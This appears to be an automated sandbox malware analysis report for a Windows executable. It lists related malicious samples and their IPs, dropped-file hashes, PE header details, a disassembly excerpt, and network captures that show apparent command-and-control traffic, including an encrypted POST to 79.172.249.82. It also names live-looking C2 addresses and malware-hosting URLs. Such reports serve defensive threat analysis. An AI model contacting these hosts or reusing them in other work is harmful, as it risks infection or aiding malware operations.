GD-EMEA-DC-SXB1DE	malware.exe	Get hash	malicious	Browse	80.86.91.232
	zeD11Fztx8.exe	Get hash	malicious	Browse	80.86.91.232
	TRS-11-0221-020.exe	Get hash	malicious	Browse	85.25.177.199
	Payment Advice.exe	Get hash	malicious	Browse	85.25.177.199
	VMtEguRH.exe	Get hash	malicious	Browse	85.25.177.199
	Reports-018315.xlsm	Get hash	malicious	Browse	185.21.102.197
	Reports-018315.xlsm	Get hash	malicious	Browse	185.21.102.197
	D12547698.VBS	Get hash	malicious	Browse	85.25.93.141
	sample.exe.exe	Get hash	malicious	Browse	80.86.91.232
	5zc9vbGBo3.exe	Get hash	malicious	Browse	217.172.179.54
	InnAcjnAmG.exe	Get hash	malicious	Browse	217.172.179.54
	yxghUyIGb4.exe	Get hash	malicious	Browse	80.86.91.232
	TaTYytHaBk.exe	Get hash	malicious	Browse	85.25.43.31
	8X93Tzvd7V.exe	Get hash	malicious	Browse	217.172.179.54
	u8A8Qy5S7O.exe	Get hash	malicious	Browse	217.172.179.54
	SecuriteInfo.com.Mal.GandCrypt-A.24654.exe	Get hash	malicious	Browse	217.172.179.54
	SecuriteInfo.com.Mal.GandCrypt-A.5674.exe	Get hash	malicious	Browse	217.172.179.54
	csrss.bin.exe	Get hash	malicious	Browse	188.138.33.233
	yx8DBT3r5r.exe	Get hash	malicious	Browse	92.51.129.66
	E00636067E.exe	Get hash	malicious	Browse	85.25.177.199
ICFSYSTEMSDE	malware.exe	Get hash	malicious	Browse	193.169.54.12
	zeD11Fztx8.exe	Get hash	malicious	Browse	193.169.54.12
	9fdUNaHzLv.exe	Get hash	malicious	Browse	193.169.54.12
	sample.exe.exe	Get hash	malicious	Browse	193.169.54.12
	yxghUyIGb4.exe	Get hash	malicious	Browse	193.169.54.12
	0HvIGwMmBV.exe	Get hash	malicious	Browse	193.169.54.12
	pitEBNziGR.exe	Get hash	malicious	Browse	193.169.54.12
	_01_.doc	Get hash	malicious	Browse	193.169.54.12
	hEHN0WzBF.exe	Get hash	malicious	Browse	193.169.54.12
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12
	http://baseballpontedipiave.com/Sales-Invoice/	Get hash	malicious	Browse	193.169.54.12
	emotet2.doc	Get hash	malicious	Browse	193.169.54.12
	20180212-20_46_01_.doc	Get hash	malicious	Browse	193.169.54.12
	http://www.yourhabitchangecoach.co.uk/wp-content/Overdue-payment/	Get hash	malicious	Browse	193.169.54.12
	SalesInvoice.doc	Get hash	malicious	Browse	193.169.54.12
	SalesInvoice.doc	Get hash	malicious	Browse	193.169.54.12
	mj03dyvx_2076767.exe	Get hash	malicious	Browse	193.169.54.12
	Scan1782384.doc	Get hash	malicious	Browse	193.169.54.12
	Scan1782384.doc	Get hash	malicious	Browse	193.169.54.12
LINODE-APLinodeLLCUS	v8iFmF7XPp.dll	Get hash	malicious	Browse	139.162.60.124
	MTCC169.DLL	Get hash	malicious	Browse	176.58.123.25
	8ScpV1CK8c.exe	Get hash	malicious	Browse	104.200.22.130
	Swift copy.pdf.exe	Get hash	malicious	Browse	45.33.51.100
	malware.exe	Get hash	malicious	Browse	173.230.145.224
	zeD11Fztx8.exe	Get hash	malicious	Browse	173.230.145.224
	CNTR-NO-GLDU7267089.xlsx	Get hash	malicious	Browse	45.56.127.45
	gunzipped.exe	Get hash	malicious	Browse	45.56.119.148
	frox0cheats.exe	Get hash	malicious	Browse	176.58.123.25
	nDHV6wKWHF.exe	Get hash	malicious	Browse	172.104.164.58
	OfficeConsultPlugin.exe	Get hash	malicious	Browse	109.237.24.104
	RFQ#798606.exe	Get hash	malicious	Browse	45.56.119.148
	Private doc.docm	Get hash	malicious	Browse	109.237.24.104
	lK8vF3n2e7.exe	Get hash	malicious	Browse	172.104.233.225
	newordermx.exe	Get hash	malicious	Browse	45.33.2.79
	sample.exe	Get hash	malicious	Browse	66.228.32.51
	BnJvVt951o.exe	Get hash	malicious	Browse	45.33.54.74
	BnJvVt951o.exe	Get hash	malicious	Browse	45.33.54.74
	SMtbg7yHyR.exe	Get hash	malicious	Browse	45.33.54.74
	9fdUNaHzLv.exe	Get hash	malicious	Browse	173.230.145.224

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5966085702512959
Encrypted:	false
SSDEEP:	6:0FIZ/llEk1GaD0JOCEfMuaaD0JOCEfMKQmD7Zb6Al/gz2cE0fMbhEZolrRSQ2hyy:0G7GaD0JcaaD0JwQQtb6Ag/0bjSQJ
MD5:	094363BE8F908743B9D630552596106A
SHA1:	7E42A69E811A96BD4433FA423CC9EB4FAF9E4B53
SHA-256:	E1B998036F4B81B95C07C1B9730C0975BEA65731925461784D574642640019F5
SHA-512:	95099CF3E65FC881C664630DA80B16EC635530374F2CF240313B70A42ABD4B0F9758830A316D5B3A6CC8B1F8EC77613F9E1390E16CEEBD6E16EB8BD192E1331B
Malicious:	false
Preview:	......:{..(......+...y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................+...y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x7b4ae7aa, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.09639948417965119
Encrypted:	false
SSDEEP:	12:A0+yPH+1O4bl4tUKu0+yPH+1O4bl4tUK:PR/XBR/X
MD5:	0EAC01569376E2645F4DF8DF2340B3A4
SHA1:	02EF7D1D5F5CB405DC5D2CD2202AC7025E3CF1DA
SHA-256:	BFC5636B87657FD87EE10F7A5D1C4E8AF12806F63646B537D765905BA7933FB1
SHA-512:	EEBBF117D9EC5847120A0E00B71B60F5B64AB13AB73136FFC53E3ABFD0DFA932541B4E105FEB29E960CAFEF73E382DA49F23CB25BC412D834CF26EFC931F83F4
Malicious:	false
Preview:	{J.... ................e.f.3...w........................&..........w...+...y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w...........................................................................................................................................................................................................................................+...y.k................gk...+...y..........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.11110880985443841
Encrypted:	false
SSDEEP:	3:fR/ll1Ev+OZAtjXl/bJdAtiy3rd/l/all:hY+OZI7t4d/lG
MD5:	1617F66803D745B33716215C9A171B8D
SHA1:	62518C2EB960F696A9345D2950A019666AB55373
SHA-256:	9D3ED0A872131F89ABC473795470ECF569E152EBF33EF2672DAF8994481CDCC4
SHA-512:	DD3BCBEE04D1538C574D868128B07838A8A2507FA4D954B01CB1C99754BE3B12DEAC79985F60207E02C38F0F027BB380FD9B9B08D597D2B95457F75E4C3DE01D
Malicious:	false
Preview:	A3.<.....................................3...w...+...y.......w...............w.......w....:O.....w..................gk...+...y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.10966965674189857
Encrypted:	false
SSDEEP:	12:263nVXm/Ey6q9995ylo7q3qQ10nMCldimE8eawHjcr9d:26Il68cumLyMCldzE9BHjc7
MD5:	367176D1B03EDA499635A77652992C62
SHA1:	F21C3F0B53E19BD7F855AE028F8F083F7906F685
SHA-256:	F7428C6ED81FFD47F823ADE137CED1A883106E941FFE719BE4F90B9A332FC8BE
SHA-512:	DA1628222D4559E0E25C16BB9166ABDD02DB57E5803943B78DDCB071507A6670C4774AE8FCA09A6F78067B6046F97E02FE2AF4C114BF89CD4B4EF4C5DECD4332
Malicious:	false
Preview:	................................................................................t...H............................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................D..,..... .....8.r.^1..........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.t...H...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11229874950717302
Encrypted:	false
SSDEEP:	12:MjXm/Ey6q9995ylmg1miM3qQ10nMCldimE8eawHza1miIUP:pl68cIg1tMLyMCldzE9BHza1tIE
MD5:	6AC46745BD263853EDFB44184D077B8C
SHA1:	B336058F9A066FF4568CC0AA3FE7CBBAF1B62AE3
SHA-256:	D808089BB5EDCD104089D914F4EBAB58760D2AA77C538CE9685634028B962E49
SHA-512:	04B40D1F60F12EFB37D387C64C8285569304EF72658E5EA2E3C1BCC609F1B2D9F549C276F9D253C584DE45FAD1CF06BBAAE28207F6AC722804883720F753633E
Malicious:	false
Preview:	................................................................................t...H............................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................D..,..... .....%\k.^1..........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.t...H...........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11221285522965302
Encrypted:	false
SSDEEP:	12:RXm/Ey6q9995ylWw1mK2P3qQ10nMCldimE8eawHza1mKQ3:8l68csw1iPLyMCldzE9BHza1M3
MD5:	C33A8B92D82C1AB19C77E4FDA91D4E4E
SHA1:	EA6B58BDA7213552E6E498485BFA5037CEB6A313
SHA-256:	D3D74C5F92335FED1FB0CDA58AFCA7037EBE8D79AD5193C0506FBA814E900738
SHA-512:	DEDDD80E121A8F5CEAA4015D545F3F976BF44A9CA3660B91C156095E99CBF95CB19B677E65C54FD332DC905216F7DC4C0BEF3655A190C3CC608D1627C20DE37E
Malicious:	false
Preview:	................................................................................t...H....1.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................D..,..... .......].^1..........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.t...H....=......................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log Download File
Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	data
Category:	modified
Size (bytes):	906
Entropy (8bit):	3.1400697254635244
Encrypted:	false
SSDEEP:	12:58KRBubdpkoF1AG3rlsEyDk9+MlWlLehB4yAq7ejCEsEyO:OaqdmuF3rlf+kWReH4yJ7MNF
MD5:	BC98B2BC99B1D5F7CCF1335AF993C93B
SHA1:	1FA3E74D1407EE96634F598B0BDD372612BE2EA1
SHA-256:	7AF2E620931016CAD14F887BB12CCDAD0B8EB15D0B278772C459C23F6B29B50C
SHA-512:	2FA1ADF6FA1F277C01B72E6B29C964B5F56A1AD75421F3539604D3412A819F514EDBB4AE1B3AFCD4B450D0E83B53B94A61F8BCF4323FB8379D6FE71AC1C43B19
Malicious:	false
Preview:	........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. W.e.d. .. A.p.r. .. 1.4. .. 2.0.2.1. .1.1.:.4.4.:.4.3.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. W.e.d. .. A.p.r. .. 1.4. .. 2.0.2.1. .1.1.:.4.4.:.4.3.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.436116781781946
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	vEjGZyD0iN.exe
File size:	45568
MD5:	ecbc4b40dcfec4ed1b2647b217da0441
SHA1:	e08eb07c69d8fc8e75927597767288a21d6ed7f6
SHA256:	878d5137e0c9a072c83c596b4e80f2aa52a8580ef214e5ba0d59daa5036a92f8
SHA512:	3ec4de3f35e10c874916a6402004e3b9fc60b5a026d20100ede992b592fe396db2bee0b225ab5f2fb85561f687a8abf0c9e7c8b3cf0344c384c80297278be7b5
SSDEEP:	768:uhBY2Tumxi0mv/LWT3uBoGMUslwORSSrUBqvWzNQRC1s:ABxT6jW7uBgyOvWS
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........R..h...h...h.......h...i...h.......h.......h.Rich..h.................PE..L...7.]Z..........................................@

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x409ee0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5A5DA737 [Tue Jan 16 07:18:15 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	4cfe8bbfb0ca5b84bbad08b043ea0c87

Entrypoint Preview

Instruction
push esi
push 0040C1F0h
push 3966646Ch
push 00000009h
mov ecx, D22E2014h
call 00007FAE90D0A53Eh
mov edx, 004011F0h
mov ecx, eax
call 00007FAE90D0A462h
add esp, 0Ch
mov ecx, 8F7EE672h
push 0040C0D0h
push 6677A1D2h
push 00000048h
call 00007FAE90D0A519h
mov edx, 004010D0h
mov ecx, eax
call 00007FAE90D0A43Dh
add esp, 0Ch
push 08000000h
push 00000000h
call dword ptr [0040C1A8h]
push eax
call dword ptr [0040C10Ch]
mov esi, eax
test esi, esi
je 00007FAE90D12878h
push 08000000h
push 00000000h
push esi
call dword ptr [0040C1F8h]
add esp, 0Ch
push esi
push 00000000h
call dword ptr [0040C1A8h]
push eax
call dword ptr [0040C1E8h]
call 00007FAE90D09E9Ah
push 00000000h
call dword ptr [0040C1ACh]
pop esi
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, edx
mov dword ptr [ebp-0Ch], ecx
mov esi, 00000001h
mov dword ptr [ebp-08h], esi
mov eax, dword ptr [edi]
cmp eax, 7Fh
jbe 00007FAE90D12861h
lea ecx, dword ptr [ecx+00h]
shr eax, 07h
inc esi
cmp eax, 7Fh

Rich Headers

Programming Language:

[LNK] VS2013 UPD4 build 31101
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbad0	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd000	0x5cc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb000	0x8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9883	0x9a00	False	0.503297483766	data	6.45508103349	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xb000	0xb2e	0xc00	False	0.160807291667	data	4.23495809712	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc000	0xbd8	0x200	False	0.123046875	data	0.91267432928	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0xd000	0x5cc	0x600	False	0.8671875	data	6.49434732961	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	WTSGetActiveConsoleSessionId

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 14, 2021 11:43:07.785733938 CEST	49706	443	192.168.2.3	79.172.249.82
Apr 14, 2021 11:43:07.839173079 CEST	443	49706	79.172.249.82	192.168.2.3
Apr 14, 2021 11:43:07.839747906 CEST	49706	443	192.168.2.3	79.172.249.82
Apr 14, 2021 11:43:07.839804888 CEST	49706	443	192.168.2.3	79.172.249.82
Apr 14, 2021 11:43:07.892940044 CEST	443	49706	79.172.249.82	192.168.2.3
Apr 14, 2021 11:43:07.893347979 CEST	443	49706	79.172.249.82	192.168.2.3
Apr 14, 2021 11:43:07.893378019 CEST	443	49706	79.172.249.82	192.168.2.3
Apr 14, 2021 11:43:07.893603086 CEST	49706	443	192.168.2.3	79.172.249.82
Apr 14, 2021 11:43:07.894906998 CEST	49706	443	192.168.2.3	79.172.249.82
Apr 14, 2021 11:43:07.949728012 CEST	443	49706	79.172.249.82	192.168.2.3
Apr 14, 2021 11:43:38.908854008 CEST	49720	8080	192.168.2.3	193.169.54.12
Apr 14, 2021 11:43:42.083831072 CEST	49720	8080	192.168.2.3	193.169.54.12
Apr 14, 2021 11:43:48.084366083 CEST	49720	8080	192.168.2.3	193.169.54.12
Apr 14, 2021 11:44:30.863162994 CEST	49740	8080	192.168.2.3	173.230.145.224
Apr 14, 2021 11:44:31.059032917 CEST	8080	49740	173.230.145.224	192.168.2.3
Apr 14, 2021 11:44:31.572434902 CEST	49740	8080	192.168.2.3	173.230.145.224
Apr 14, 2021 11:44:31.769329071 CEST	8080	49740	173.230.145.224	192.168.2.3
Apr 14, 2021 11:44:32.275563955 CEST	49740	8080	192.168.2.3	173.230.145.224
Apr 14, 2021 11:44:32.472771883 CEST	8080	49740	173.230.145.224	192.168.2.3
Apr 14, 2021 11:45:02.894905090 CEST	49743	7080	192.168.2.3	80.86.91.232
Apr 14, 2021 11:45:05.903651953 CEST	49743	7080	192.168.2.3	80.86.91.232

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 14, 2021 11:42:52.107168913 CEST	51281	53	192.168.2.3	8.8.8.8
Apr 14, 2021 11:42:52.156163931 CEST	53	51281	8.8.8.8	192.168.2.3
Apr 14, 2021 11:42:53.281032085 CEST	49199	53	192.168.2.3	8.8.8.8
Apr 14, 2021 11:42:53.341649055 CEST	53	49199	8.8.8.8	192.168.2.3
Apr 14, 2021 11:42:53.391813993 CEST	50620	53	192.168.2.3	8.8.8.8
Apr 14, 2021 11:42:53.440597057 CEST	53	50620	8.8.8.8	192.168.2.3
Apr 14, 2021 11:43:24.655630112 CEST	64938	53	192.168.2.3	8.8.8.8
Apr 14, 2021 11:43:24.707287073 CEST	53	64938	8.8.8.8	192.168.2.3
Apr 14, 2021 11:43:25.817858934 CEST	60152	53	192.168.2.3	8.8.8.8
Apr 14, 2021 11:43:25.866787910 CEST	53	60152	8.8.8.8	192.168.2.3
Apr 14, 2021 11:43:27.487283945 CEST	57544	53	192.168.2.3	8.8.8.8
Apr 14, 2021 11:43:27.571316004 CEST	53	57544	8.8.8.8	192.168.2.3
Apr 14, 2021 11:43:28.965804100 CEST	55984	53	192.168.2.3	8.8.8.8
Apr 14, 2021 11:43:29.014842987 CEST	53	55984	8.8.8.8	192.168.2.3
Apr 14, 2021 11:43:29.741539001 CEST	64185	53	192.168.2.3	8.8.8.8
Apr 14, 2021 11:43:29.801790953 CEST	53	64185	8.8.8.8	192.168.2.3
Apr 14, 2021 11:43:30.604532957 CEST	65110	53	192.168.2.3	8.8.8.8
Apr 14, 2021 11:43:30.653295994 CEST	53	65110	8.8.8.8	192.168.2.3
Apr 14, 2021 11:43:30.984755039 CEST	58361	53	192.168.2.3	8.8.8.8
Apr 14, 2021 11:43:31.045522928 CEST	53	58361	8.8.8.8	192.168.2.3
Apr 14, 2021 11:43:31.737567902 CEST	63492	53	192.168.2.3	8.8.8.8
Apr 14, 2021 11:43:31.788723946 CEST	53	63492	8.8.8.8	192.168.2.3
Apr 14, 2021 11:43:33.589778900 CEST	60831	53	192.168.2.3	8.8.8.8
Apr 14, 2021 11:43:33.638511896 CEST	53	60831	8.8.8.8	192.168.2.3
Apr 14, 2021 11:43:34.357992887 CEST	60100	53	192.168.2.3	8.8.8.8
Apr 14, 2021 11:43:34.409686089 CEST	53	60100	8.8.8.8	192.168.2.3
Apr 14, 2021 11:43:41.996906042 CEST	53195	53	192.168.2.3	8.8.8.8
Apr 14, 2021 11:43:42.071863890 CEST	53	53195	8.8.8.8	192.168.2.3
Apr 14, 2021 11:43:50.746473074 CEST	50141	53	192.168.2.3	8.8.8.8
Apr 14, 2021 11:43:50.814496040 CEST	53	50141	8.8.8.8	192.168.2.3
Apr 14, 2021 11:43:58.917186975 CEST	53023	53	192.168.2.3	8.8.8.8
Apr 14, 2021 11:43:58.967308998 CEST	53	53023	8.8.8.8	192.168.2.3
Apr 14, 2021 11:44:00.192394018 CEST	49563	53	192.168.2.3	8.8.8.8
Apr 14, 2021 11:44:00.252368927 CEST	53	49563	8.8.8.8	192.168.2.3
Apr 14, 2021 11:44:01.377516031 CEST	51352	53	192.168.2.3	8.8.8.8
Apr 14, 2021 11:44:01.429486990 CEST	53	51352	8.8.8.8	192.168.2.3
Apr 14, 2021 11:44:02.467273951 CEST	59349	53	192.168.2.3	8.8.8.8
Apr 14, 2021 11:44:02.517357111 CEST	53	59349	8.8.8.8	192.168.2.3
Apr 14, 2021 11:44:03.600243092 CEST	57084	53	192.168.2.3	8.8.8.8
Apr 14, 2021 11:44:03.648941994 CEST	53	57084	8.8.8.8	192.168.2.3
Apr 14, 2021 11:44:06.855969906 CEST	58823	53	192.168.2.3	8.8.8.8
Apr 14, 2021 11:44:06.914968014 CEST	53	58823	8.8.8.8	192.168.2.3
Apr 14, 2021 11:44:14.115796089 CEST	57568	53	192.168.2.3	8.8.8.8
Apr 14, 2021 11:44:14.164699078 CEST	53	57568	8.8.8.8	192.168.2.3
Apr 14, 2021 11:44:26.567142963 CEST	50540	53	192.168.2.3	8.8.8.8
Apr 14, 2021 11:44:26.615823984 CEST	53	50540	8.8.8.8	192.168.2.3
Apr 14, 2021 11:44:27.805074930 CEST	54366	53	192.168.2.3	8.8.8.8
Apr 14, 2021 11:44:27.854285002 CEST	53	54366	8.8.8.8	192.168.2.3
Apr 14, 2021 11:44:28.926460028 CEST	53034	53	192.168.2.3	8.8.8.8
Apr 14, 2021 11:44:28.978002071 CEST	53	53034	8.8.8.8	192.168.2.3
Apr 14, 2021 11:44:29.776983023 CEST	57762	53	192.168.2.3	8.8.8.8
Apr 14, 2021 11:44:29.837472916 CEST	53	57762	8.8.8.8	192.168.2.3
Apr 14, 2021 11:44:38.847352028 CEST	55435	53	192.168.2.3	8.8.8.8
Apr 14, 2021 11:44:38.932538033 CEST	53	55435	8.8.8.8	192.168.2.3
Apr 14, 2021 11:44:40.200555086 CEST	50713	53	192.168.2.3	8.8.8.8
Apr 14, 2021 11:44:40.265592098 CEST	53	50713	8.8.8.8	192.168.2.3

HTTP Request Dependency Graph

79.172.249.82:443

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49706	79.172.249.82	443	C:\Windows\SysWOW64\appsys.exe

Timestamp	kBytes transferred	Direction	Data
Apr 14, 2021 11:43:07.839804888 CEST	968	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 79.172.249.82:443 Content-Length: 436 Connection: Keep-Alive Cache-Control: no-cache Data Raw: a2 3d 2a 49 b9 06 f3 21 6b a7 b6 8a 8f 13 67 18 b4 45 8e 65 f4 38 7f d7 a5 3d cd ab a1 27 8c 63 f6 ea 88 f0 50 6d 06 50 e5 4c 75 d6 0a 63 35 73 9f 1d fe b9 13 80 5e 54 f6 ae a8 aa a1 74 de fe 36 4f f9 ab a3 2a d8 a9 13 19 28 a2 a3 b2 b3 d2 17 b1 dd 7b b8 f0 69 55 0b 48 87 ea bc 76 3d 6b 0c fb d2 a6 0d 94 e4 f7 c2 b5 2a b5 55 82 90 ed f8 3a 96 5c 5d 0f 1f ec f4 e5 ac a1 9b eb b7 b8 bf 03 38 45 fd 2d 14 c7 fa b6 ac 7f 03 d3 a2 9a ac e1 8d 8f 16 b2 73 52 ea 05 2c 1a f6 93 85 0a 6f a1 8f 51 fe d4 2b c2 82 e0 1e eb 8e 51 b3 a7 70 c8 fb 67 df 00 b9 4f 95 58 e4 25 3e ce c8 03 fe 14 b2 0d 82 4b 46 de 52 24 10 83 89 06 